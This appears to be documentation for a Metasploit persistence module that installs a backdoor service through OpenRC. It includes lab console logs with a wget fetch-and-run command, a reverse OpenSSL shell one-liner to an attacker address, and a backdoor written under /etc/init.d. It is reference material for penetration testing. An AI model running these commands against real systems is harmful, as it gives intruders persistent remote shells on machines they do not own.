adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
91633fdad7e9474debefbfd044d2b8bc7652deee
metasploit-gs/documentation/modules/exploit/linux/persistence/init_openrc.md
T
h00die ebe0234ddb Update documentation/modules/exploit/linux/persistence/init_openrc.md 
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2025-09-15 16:30:17 -04:00

117 lines
4.5 KiB
Markdown
Raw Blame History

## Vulnerable Application
This module will create a service on the box via OpenRC, and mark it for auto-restart.
We need enough access to write service files and potentially restart services.
Verified against alpine 3.21.2
## Verification Steps
1. Exploit a box and get a **root** session
2. `use exploit/linux/persistence/init_openrc `
3. `set SESSION <session>`
4. `set PAYLOAD <payload>`
5. `set LHOST <lhost>`
6. `exploit`
## Options
### WritableDir
Remote writable directory to store the payload. Avoid using `/tmp` as it will be deleted upon reboot.
### SERVICE
The name of the service to create. If not chosen, a random one is created.
### PAYLOAD_NAME
The name of the file to write with our shell if a non-cmd payload is used. If not chosen, a random one is created.
## Scenarios
### Alpine Linux 3.21.2
Of note, the default install of Alpine doesn't have `curl`, or `bash`. The `OpenSSL` payload was confirmed working though
Initial access vector via web delivery
```
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO xK7yCqmS --no-check-certificate http://111.111.1.111:8181/l; chmod +x xK7yCqmS; ./xK7yCqmS& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.222
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:33954) at 2025-02-09 09:31:16 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/root) > getuid
Server username: root
(Meterpreter 1)(/root) > sysinfo
Computer : alpine3.21.2
OS : (Linux 6.12.12-0-virt)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
(Meterpreter 1)(/root) > background
[*] Backgrounding session 1...
```
Persistence
```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_openrc
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > set payload payload/cmd/unix/reverse_openssl
payload => cmd/unix/reverse_openssl
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_openrc) > exploit
[+] sh -c '(sleep 4296|openssl s_client -quiet -connect 111.111.1.111:4444|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 111.111.1.111:4444 >/dev/null 2>&1 &)'
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/init_openrc) >
[*] Started reverse double SSL handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /tmp/ is writable and openrc based
[*] Writing backdoor to /tmp//rljkrbglMY
[*] Writing service: /etc/init.d/GpdAgZVBGWq
[*] Writing '/etc/init.d/GpdAgZVBGWq' (141 bytes) ...
[*] Enabling service
[+] Starting service
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/alpine3.21.2_20250209.3159/alpine3.21.2_20250209.3159.rc
[*] Command: echo duVbKHsRwQ5D05J7;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "duVbKHsRwQ5D05J7\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (111.111.1.111:4444 -> 222.222.2.222:43560) at 2025-02-09 09:32:07 -0500
```
Reference in New Issue View Git Blame Copy Permalink